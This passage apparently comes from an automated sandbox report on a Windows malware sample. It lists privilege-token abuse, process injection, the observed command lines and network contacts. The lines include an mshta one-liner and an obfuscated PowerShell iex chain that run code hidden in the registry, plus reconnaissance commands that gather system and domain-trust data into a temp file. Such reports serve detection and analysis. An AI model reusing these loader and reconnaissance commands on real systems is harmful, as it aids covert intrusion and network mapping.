N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1184 wrote to memory of 1716 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 376 wrote to memory of 1520 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1520 wrote to memory of 2812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2812 wrote to memory of 3684 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1520 wrote to memory of 3736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3736 wrote to memory of 4164 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1520 wrote to memory of 1028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1716 wrote to memory of 4028 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\control.exe
PID 1028 wrote to memory of 3520 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 wrote to memory of 3784 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 wrote to memory of 4816 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1028 wrote to memory of 3256 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 4028 wrote to memory of 4244 N/A C:\Windows\system32\control.exe C:\Windows\system32\rundll32.exe
PID 1028 wrote to memory of 4196 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 4012 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1028 wrote to memory of 3240 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 4196 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 1028 wrote to memory of 1224 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1028 wrote to memory of 2348 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2348 wrote to memory of 3636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 1028 wrote to memory of 1308 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1028 wrote to memory of 1448 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>U8sf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(U8sf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\FAC9767C-11D1-3C57-6BCE-D530CFE2D964\\\LineStop'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name bjunbw -value gp; new-alias -name dqmwsgwvn -value iex; dqmwsgwvn ([System.Text.Encoding]::ASCII.GetString((bjunbw "HKCU:Software\AppDataLow\Software\Microsoft\FAC9767C-11D1-3C57-6BCE-D530CFE2D964").MaskStop))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4F20.tmp" "c:\Users\Admin\AppData\Local\Temp\qpvas05h\CSCA3E45F721DCC41A99BA936F9208D8B74.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5087.tmp" "c:\Users\Admin\AppData\Local\Temp\e25fyw13\CSC7A9004E1C5EB484596BB47739548E5.TMP"

C:\Windows\system32\control.exe

C:\Windows\system32\control.exe -h

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"

C:\Windows\system32\net.exe

net view /all

Network

Country Destination Domain Proto
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 13.107.42.16:80 config.edge.skype.com tcp
NL 79.110.52.8:80 79.110.52.8 tcp
RU 5.42.199.72:80 5.42.199.72 tcp
NL 79.110.52.82:80 79.110.52.82 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp

Files

\??\c:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\qpvas05h\CSCA3E45F721DCC41A99BA936F9208D8B74.TMP

C:\Users\Admin\AppData\Local\Temp\RES4F20.tmp

C:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.dll

\??\c:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\e25fyw13\CSC7A9004E1C5EB484596BB47739548E5.TMP

C:\Users\Admin\AppData\Local\Temp\RES5087.tmp

C:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.dll

C:\Users\Admin\AppData\Local\Temp\3BC.bin1